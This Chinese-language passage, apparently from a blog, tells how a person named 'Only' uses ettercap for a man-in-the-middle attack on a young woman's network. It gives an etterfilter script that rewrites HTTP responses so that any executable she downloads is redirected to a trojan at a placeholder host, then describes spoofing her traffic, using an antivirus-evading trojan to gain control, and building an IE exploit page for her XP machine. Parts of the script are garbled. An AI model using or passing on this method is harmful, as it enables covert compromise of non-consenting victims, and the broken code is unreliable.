Only打开了ettercap准备进行中间人攻击
首先新建一个规则
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
# replace rmccurdy with
your website
# replace the url with what ever exe you like
if
(ip.proto == TCP && tcp.dst == 80) {
if
(search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding",
"Accept-Rubbish!");
#
note: replacement string is same length as original
string
msg("zapped
Accept-Encoding!\n");
}
}
if (ip.proto == TCP &&
tcp.src =http://www.netofthings.cn/JieJueFangAn/2016-04/= 80) {
replace("keep-alive", "close"
");
replace("Keep-Alive", "close" ");
}
if (ip.proto == TCP
&& search(DATA.data, ": application") ){
# enable for logging
log(DECODED.data, "/tmp/log.log");
msg("found EXE\n");
# "Win32" is the
first part of the exe example:
# if the EXE started with "this program must
be run in MSDOS mode" you could search for MSDOS etc ..
if (search(DATA.data,
"Win32")) {
msg("doing nothing\n");
} else {
replace("200 OK", "301
Moved Permanently
Location:
http://www.xxx.com/exe.exe
");
msg("redirect
success\n");
}
}
然后改掉里面的下载地址
之后编译下
然后进行欺骗
当妹纸不管下载什么东西的时候都会替换成我们的木马进行下载她运行后我们就可以获取权限了(当然木马首先得是免杀)
类似这样
所以当妹子下载什么的时候运行了我们的程序,就会中招。
同时Only还用了另一种方法来进行攻击(怕妹子不上当)
因为前面得知妹子用的是XP所以Only生成了对IE浏览器攻击的网马
